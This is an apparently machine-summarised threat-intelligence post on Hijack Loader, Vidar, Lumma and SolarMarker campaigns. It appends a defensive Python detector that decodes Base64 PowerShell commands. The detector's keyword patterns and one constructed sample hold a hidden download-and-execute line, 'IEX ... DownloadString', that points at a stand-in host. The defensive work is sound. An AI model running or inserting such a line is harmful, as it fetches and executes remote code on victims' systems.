June 18, 2024 at 10:00AM
Threat actors are distributing malicious software through free/pirated commercial software. Hijack Loader camouflages as a Cisco Webex Meetings’ ptService module, stealthily introducing Vidar Stealer. The attack uses DLL side-loading and PowerShell scripts, while other actors employ social engineering tactics to deliver malware like Lumma Stealer and SolarMarker. This underscores the need for cautious online behavior and pre-emptive detection measures.
Based on the meeting notes, we have identified several key takeaways:
1. Threat actors are using various techniques such as luring users with free or pirated software, DLL side-loading, and social engineering tactics to propagate malware like Hijack Loader, Vidar Stealer, Lumma Stealer, Amadey Loader, XMRig miner, and DarkGate.
2. The malware employs techniques such as bypassing User Account Control (UAC), exploiting the CMSTPLUA COM interface for privilege escalation, and leveraging PowerShell scripts to execute malicious payloads.
3. The attack chain involves the theft of sensitive credentials from web browsers, deploying a cryptocurrency miner, and rerouting crypto transactions to attacker-controlled wallets.
4. The ClearFake and ClickFix campaigns use fake browser update lures to entice site visitors into executing PowerShell scripts that propagate malware.
5. Threat actors use social engineering tactics in malspam campaigns, such as sending emails with HTML attachments to trick users into executing Base64-encoded PowerShell commands and installing malicious files.
6. The SolarMarker malware leverages lookalike websites impersonating legitimate platforms to distribute information-stealing malware using SEO poisoning techniques.
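Items 2, 4 and 5 all come back to PowerShell, and item 5 specifically to Base64-encoded commands launched from an HTML attachment. The detection below is an added example, not code from the original article: it takes process-creation command lines (constructed samples, not real telemetry), unwraps the `-EncodedCommand` argument (Base64 of UTF-16LE text), and flags decoded scripts that chain a download to an execution, while leaving routine encoded administrative commands alone.

```python
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand (other unambiguous prefixes also work).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)")
# Download-and-execute building blocks commonly seen in decoded first-stage scripts.
SUSPICIOUS = re.compile(
    r"(?i)(invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|frombase64string|start-process|-bypass|hidden)")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand argument; None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Report whether a command line carries an encoded command and what the payload does."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return {"encoded": False, "decoded": None, "indicators": [], "suspicious": False}
    decoded = decode_encoded_command(m.group(1))
    indicators = sorted({w.lower() for w in SUSPICIOUS.findall(decoded or "")})
    # A blob that claims to be an encoded command but will not decode deserves an alert too.
    return {"encoded": True, "decoded": decoded, "indicators": indicators,
            "suspicious": decoded is None or bool(indicators)}


def triage(events: List[str]) -> List[Dict[str, object]]:
    """Return the analysis records, with the original command line, for events worth alerting on."""
    hits = []
    for cmd in events:
        record = analyze_command_line(cmd)
        record["cmdline"] = cmd
        if record["suspicious"]:
            hits.append(record)
    return hits


def _enc(script: str) -> str:
    """Encode a script the way powershell.exe expects it for -EncodedCommand (helper for samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation command lines (not taken from any real incident).
SAMPLE_EVENTS = [
    "powershell.exe -NoP -W Hidden -enc " + _enc(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')"),
    "powershell.exe -EncodedCommand " + _enc("Get-Service -Name Spooler | Select-Object Status"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -ec Zm9vYg",  # truncated blob: incorrect padding, cannot be decoded
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["indicators"], "<-", (hit["decoded"] or "<undecodable>")[:60])
```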
These tactics demonstrate the evolving and sophisticated nature of malware campaigns, which require proactive detection and blocking measures to mitigate the associated risks.